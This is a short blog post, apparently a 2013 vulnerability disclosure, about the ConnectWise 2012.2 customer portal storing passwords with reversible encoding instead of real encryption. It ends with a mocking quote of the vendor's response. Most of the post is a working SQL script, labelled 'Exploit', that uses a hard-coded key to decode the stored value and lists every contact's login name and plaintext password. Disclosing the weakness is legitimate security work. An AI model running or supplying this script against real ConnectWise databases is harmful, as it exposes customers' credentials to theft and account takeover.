Connectwise Password Recovery
October 02, 2013Connectwise password decryption and recovery
The release notes for the 2012.2 edition of Connectwise claim, as a welcome feature, “The customer portal password … is now encrypted”. Unfortunately, what we see is not encryption. What we see is pointless, reversible exercise in incompetence.
Exploit
The below SQL script will produce a table featuring every user’s login name and password.
{% highlight sql %} BEGIN
DECLARE @KeyValue nchar(15), @OutputValue varchar(20), @Working nchar(10), @WorkingKey nchar(10), @Username nchar(32), @LoopCount integer, @CalcKey integer, @WorkingInt integer, @WorkingKeyInt integer, @InputValue nchar(20)
DECLARE pass_cursor CURSOR FOR SELECT CM_Password, Description FROM dbo.Contact, dbo.Contact_Communication WHERE contact.Contact_RecID = Contact_Communication.Contact_RecID AND Communication_Type_RecID = ‘1’ AND CM_Password is not NULL
OPEN pass_cursor
FETCH NEXT FROM pass_cursor INTO @InputValue, @Username
WHILE @@FETCH_STATUS = 0 BEGIN SET @KeyValue = ‘RASCENCRYPT101R’ SET @LoopCount = 1 SET @OutputValue = ” WHILE len(@InputValue) >= @LoopCount BEGIN SET @Working = ascii(substring(@InputValue, @LoopCount, 1)) SET @WorkingKey = ascii(substring(@KeyValue, @LoopCount, 1)) IF convert(integer, @Working) < convert(integer, @WorkingKey) BEGIN SET @Working = char(convert(integer, (@Working + 255)) - convert(integer, @WorkingKey)) END ELSE BEGIN SET @Working = char(convert(integer, @Working) - convert (integer, @WorkingKey)) END SET @LoopCount = @LoopCount + 1 SET @OutputValue = @OutputValue + convert(char(1), @working) END
SELECT @Username, @outputvalue
FETCH NEXT FROM pass_cursor
INTO @InputValue, @UsernameEND
CLOSE pass_cursor; DEALLOCATE pass_cursor;
END
{% endhighlight %}
Vendor Response
The vendor responds “Connectwise is secured through the purchase of an SSL certificate” (WTF?)